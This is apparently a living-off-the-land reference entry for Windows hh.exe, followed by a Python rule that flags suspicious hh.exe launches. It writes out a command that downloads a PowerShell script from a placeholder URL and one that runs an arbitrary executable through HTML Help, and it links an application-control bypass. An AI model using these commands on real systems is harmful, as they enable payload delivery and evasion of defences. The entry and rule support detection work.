Hh.exe

Binary used for processing chm files in Windows


Paths:


Resources:
https://oddvar.moe/2017/08/13/bypassing-device-guard-umci-using-chm-cve-2017-8625/

Acknowledgement:
Oddvar Moe - @oddvarmoe


Detection:
hh.exe should not normally be in use on a typical workstation.



Download

Open the target PowerShell script with HTML Help.
HH.exe http://some.url/script.ps1
Usecase: Download files from URL
Privileges required: User
OS: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Mitre: T1105



Execute

Executes calc.exe with HTML Help.
HH.exe c:\windows\system32\calc.exe
Usecase: Execute process with HH.exe
Privileges required: User
OS: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Mitre: T1216
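
The Detection note and the two command lines above can be turned into a triage rule over process-creation telemetry. This is an added example, not part of the original entry; the event tuples, image paths, label names and function names are constructed for illustration.

```python
import re
from pathlib import PureWindowsPath

# Constructed sample process-creation records: (image path, command line).
SAMPLE_EVENTS = [
    (r"C:\Windows\hh.exe", r"HH.exe http://some.url/script.ps1"),
    (r"C:\Windows\hh.exe", r"HH.exe c:\windows\system32\calc.exe"),
    (r"C:\Windows\hh.exe", r'"C:\Windows\hh.exe" "C:\Program Files\App\manual.chm"'),
    (r"C:\Windows\System32\notepad.exe", r"notepad.exe notes.txt"),
]

TOKEN_RE = re.compile(r'"[^"]*"|\S+')                  # quoted or bare tokens
URL_RE = re.compile(r"^[a-z][a-z0-9+.-]*://", re.I)   # scheme://...


def classify_hh_launch(image, command_line):
    """Return None for processes other than hh.exe, else a triage label."""
    if PureWindowsPath(image).name.lower() != "hh.exe":
        return None
    # Drop the program token; the rest are the arguments hh.exe received.
    args = [t.strip('"') for t in TOKEN_RE.findall(command_line)][1:]
    if not args:
        return "hh-no-argument"
    # A URL argument matches the Download entry on this page.
    if any(URL_RE.match(a) for a in args):
        return "hh-remote-url"
    # A local target that is not a .chm file matches the Execute entry.
    if any(PureWindowsPath(a).suffix.lower() != ".chm" for a in args):
        return "hh-non-chm-target"
    # Opening a local .chm is the intended use, but per the Detection note
    # any hh.exe launch on a workstation is still uncommon.
    return "hh-local-chm"


def triage(events):
    """Return (label, command line) for every hh.exe launch in events."""
    hits = []
    for image, command_line in events:
        label = classify_hh_launch(image, command_line)
        if label is not None:
            hits.append((label, command_line))
    return hits


if __name__ == "__main__":
    for label, command_line in triage(SAMPLE_EVENTS):
        print(f"{label:20} {command_line}")
```

Unquoted paths containing spaces split into several tokens and fall into `hh-non-chm-target`, so the rule errs toward flagging.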